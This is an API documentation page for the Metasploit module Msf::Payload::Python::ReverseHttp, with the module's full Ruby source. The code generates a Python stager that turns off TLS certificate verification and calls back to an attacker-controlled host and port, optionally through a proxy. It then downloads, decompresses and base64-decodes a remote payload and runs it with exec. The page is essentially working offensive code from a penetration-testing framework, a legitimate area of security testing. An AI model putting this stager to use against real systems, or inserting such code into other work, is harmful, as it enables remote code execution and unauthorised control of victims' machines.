Module: Msf::Payload::Python::ReverseHttp
- Includes:
- UUID::Options
- Defined in:
- lib/msf/core/payload/python/reverse_http.rb
Constant Summary
Constants included from Rex::Payloads::Meterpreter::UriChecksum
Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN_MAX_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITP, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITW, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INIT_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MIN_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MODES, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_UUID_MIN_LEN
Instance Method Summary collapse
-
#generate(opts = {}) ⇒ Object
Generate the first stage.
-
#generate_callback_uri(opts = {}) ⇒ Object
Return the longest URI that fits into our available space.
-
#generate_callback_url(opts) ⇒ Object
Return the callback URL.
- #generate_reverse_http(opts = {}) ⇒ Object
- #initialize(info = {}) ⇒ Object
-
#required_space ⇒ Object
Determine the maximum amount of space required for the features requested.
Methods included from UUID::Options
#generate_payload_uuid, #generate_uri_uuid_mode, #record_payload_uuid, #record_payload_uuid_url
Methods included from Rex::Payloads::Meterpreter::UriChecksum
#generate_uri_checksum, #generate_uri_uuid, #process_uri_resource, #uri_checksum_lookup
Instance Method Details
#generate(opts = {}) ⇒ Object
Generate the first stage
21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
# File 'lib/msf/core/payload/python/reverse_http.rb', line 21 def generate(opts={}) ds = opts[:datastore] || datastore opts.merge!({ host: ds['LHOST'] || '127.127.127.127', port: ds['LPORT'], proxy_host: ds['HttpProxyHost'], proxy_port: ds['HttpProxyPort'], proxy_user: ds['HttpProxyUser'], proxy_pass: ds['HttpProxyPass'], user_agent: ds['HttpUserAgent'], header_host: ds['HttpHostHeader'], header_cookie: ds['HttpCookie'], header_referer: ds['HttpReferer'] }) opts[:scheme] = 'http' if opts[:scheme].nil? generate_reverse_http(opts) end |
#generate_callback_uri(opts = {}) ⇒ Object
Return the longest URI that fits into our available space
62 63 64 65 66 67 68 69 70 71 72 |
# File 'lib/msf/core/payload/python/reverse_http.rb', line 62 def generate_callback_uri(opts={}) uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length)) # Generate the short default URL if we don't have enough space if self.available_space.nil? || dynamic_size? || required_space > self.available_space uri_req_len = 30 end uuid = generate_payload_uuid(arch: ARCH_PYTHON, platform: 'python') generate_uri_uuid_mode(opts[:uri_uuid_mode] || :init_python, uri_req_len, uuid: uuid) end |
#generate_callback_url(opts) ⇒ Object
Return the callback URL
43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 |
# File 'lib/msf/core/payload/python/reverse_http.rb', line 43 def generate_callback_url(opts) # required opts: # host, port, scheme if Rex::Socket.is_ipv6?(opts[:host]) target_url = "#{opts[:scheme]}://[#{opts[:host]}]" else target_url = "#{opts[:scheme]}://#{opts[:host]}" end target_url << ':' target_url << opts[:port].to_s target_url << luri target_url << generate_callback_uri(opts) target_url end |
#generate_reverse_http(opts = {}) ⇒ Object
74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 |
# File 'lib/msf/core/payload/python/reverse_http.rb', line 74 def generate_reverse_http(opts={}) # required opts: # proxy_host, proxy_port, scheme, user_agent var_escape = lambda { |txt| txt.gsub('\\', '\\' * 4).gsub('\'', %q(\\\')) } proxy_host = opts[:proxy_host] proxy_port = opts[:proxy_port] proxy_user = opts[:proxy_user] proxy_pass = opts[:proxy_pass] urllib_fromlist = ['\'build_opener\''] urllib_fromlist << '\'HTTPSHandler\'' if opts[:scheme] == 'https' if proxy_host.to_s != '' urllib_fromlist << '\'ProxyHandler\'' unless proxy_user.to_s == '' && proxy_pass.to_s == '' urllib_fromlist << '\'ProxyBasicAuthHandler\'' end end urllib_fromlist = '[' + urllib_fromlist.join(',') + ']' cmd = "import zlib,base64,sys\n" cmd << "vi=sys.version_info\n" cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=#{urllib_fromlist})\n" cmd << "hs=[]\n" if opts[:scheme] == 'https' # Context added to HTTPSHandler in 2.7.9 and 3.4.3 cmd << "if (vi[0]==2 and vi>=(2,7,9)) or vi>=(3,4,3):\n" cmd << "\timport ssl\n" cmd << "\tsc=ssl.SSLContext(ssl.PROTOCOL_SSLv23)\n" cmd << "\tsc.check_hostname=False\n" cmd << "\tsc.verify_mode=ssl.CERT_NONE\n" cmd << "\ths.append(ul.HTTPSHandler(0,sc))\n" end if proxy_host.to_s != '' proxy_url = "http://" unless proxy_user.to_s == '' && proxy_pass.to_s == '' proxy_url << "#{Rex::Text.uri_encode(proxy_user)}:#{Rex::Text.uri_encode(proxy_pass)}@" end proxy_url << (Rex::Socket.is_ipv6?(proxy_host) ? "[#{proxy_host}]" : proxy_host) proxy_url << ":#{proxy_port}" cmd << "hs.append(ul.ProxyHandler({'#{opts[:scheme]}':'#{var_escape.call(proxy_url)}'}))\n" unless proxy_user.to_s == '' && proxy_pass.to_s == '' cmd << "hs.append(ul.ProxyBasicAuthHandler())\n" end end headers = [] headers << "('User-Agent','#{var_escape.call(opts[:user_agent])}')" headers << "('Cookie','#{var_escape.call(opts[:header_cookie])}')" if opts[:header_cookie] headers << "('Referer','#{var_escape.call(opts[:header_referer])}')" if opts[:header_referer] cmd << "o=ul.build_opener(*hs)\n" cmd << "o.addheaders=[#{headers.join(',')}]\n" if opts[:header_host] cmd << "exec(zlib.decompress(base64.b64decode(o.open(ul.Request('#{generate_callback_url(opts)}',None,{'Host':'#{var_escape.call(opts[:header_host])}'})).read())))\n" else cmd << "exec(zlib.decompress(base64.b64decode(o.open('#{generate_callback_url(opts)}').read())))\n" end py_create_exec_stub(cmd) end |
#initialize(info = {}) ⇒ Object
9 10 11 12 13 14 15 16 |
# File 'lib/msf/core/payload/python/reverse_http.rb', line 9 def initialize(info = {}) super(info) ( Msf::Opt:: + Msf::Opt:: ) ('HttpProxyType') end |
#required_space ⇒ Object
Determine the maximum amount of space required for the features requested
143 144 145 146 147 148 149 150 151 152 153 154 155 |
# File 'lib/msf/core/payload/python/reverse_http.rb', line 143 def required_space # Start with our cached default generated size space = cached_size # Add 100 bytes for the encoder to have some room space += 100 # Make room for the maximum possible URL length space += 256 # The final estimated size space end |